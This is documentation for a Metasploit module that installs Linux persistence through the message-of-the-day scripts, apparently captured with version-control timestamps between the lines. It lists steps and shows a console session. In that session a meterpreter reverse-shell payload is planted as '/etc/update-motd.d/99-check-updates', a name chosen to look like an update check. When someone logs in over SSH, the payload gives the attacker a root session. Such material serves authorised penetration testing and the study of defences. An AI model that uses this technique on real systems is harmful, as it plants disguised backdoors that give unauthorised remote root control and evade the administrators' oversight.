2024-10-09 12:18:35 -04:00
This is a post module that performs a persistence installation on a Linux system using [motd ](https://manpages.debian.org/bookworm/manpages/motd.5.en.html ).
To trigger the persistence execution, an external event such as a user logging in to the system with SSH is required.
2024-10-08 11:17:33 -04:00
## Verification Steps
1. Start msfconsole
2. Obtain a session on the target machine
3. `use exploit/linux/local/motd_persistence`
4. `set session -1`
5. `exploit`
## Module usage
```
2025-07-17 09:53:40 +01:00
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/motd_persistence
2024-10-08 11:17:33 -04:00
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
2025-07-17 09:53:40 +01:00
msf exploit(linux/local/motd_persistence) > set session -1
2024-10-08 11:17:33 -04:00
session => -1
2025-07-17 09:53:40 +01:00
msf exploit(linux/local/motd_persistence) > exploit
2024-10-08 11:17:33 -04:00
[*] /etc/update-motd.d/99-check-updates written
2025-07-17 09:53:40 +01:00
msf exploit(linux/local/motd_persistence) >
2024-10-08 11:17:33 -04:00
[*] Sending stage (3045380 bytes) to 172.18.49.39
[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
2025-07-17 09:53:40 +01:00
msf exploit(linux/local/motd_persistence) > sessions -i -1
2024-10-08 11:17:33 -04:00
[*] Starting interaction with 2...
meterpreter > getuid
Server username: root
meterpreter >
```
## Options
### BACKDOOR_NAME
Specify the name of the file to insert in the motd directory. (Default: 99-check-updates)
